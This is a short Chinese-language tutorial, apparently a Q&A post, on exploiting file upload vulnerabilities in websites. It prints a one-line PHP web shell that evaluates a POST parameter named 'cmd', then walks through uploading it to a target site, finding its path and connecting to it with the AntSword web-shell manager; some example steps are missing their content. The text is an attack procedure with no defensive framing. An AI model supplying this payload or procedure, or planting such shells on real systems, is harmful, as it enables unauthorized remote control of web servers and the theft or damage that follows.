文件上传漏洞一般会怎么利用?
准备知识:
一句话木马:<?php @eval($_POST['cmd']); ?>
木马连接工具如:AntSword(蚁剑)
首先把一句话木马写入到php文件中
然后找到一个上传文件的地方把php文件上传上去,比如:
上传木马后找到木马上传的位置
编辑 把这个复制粘贴到地址栏里的链接后面,如下:
按回车
然后复制链接,打开AntSword,点击add
然后会弹出个框,在shell url地方粘贴刚才地址栏复制的链接,shell pwd地方输入cmd然后按add即可
双击刚才添加的
可以看到木马已经连接上了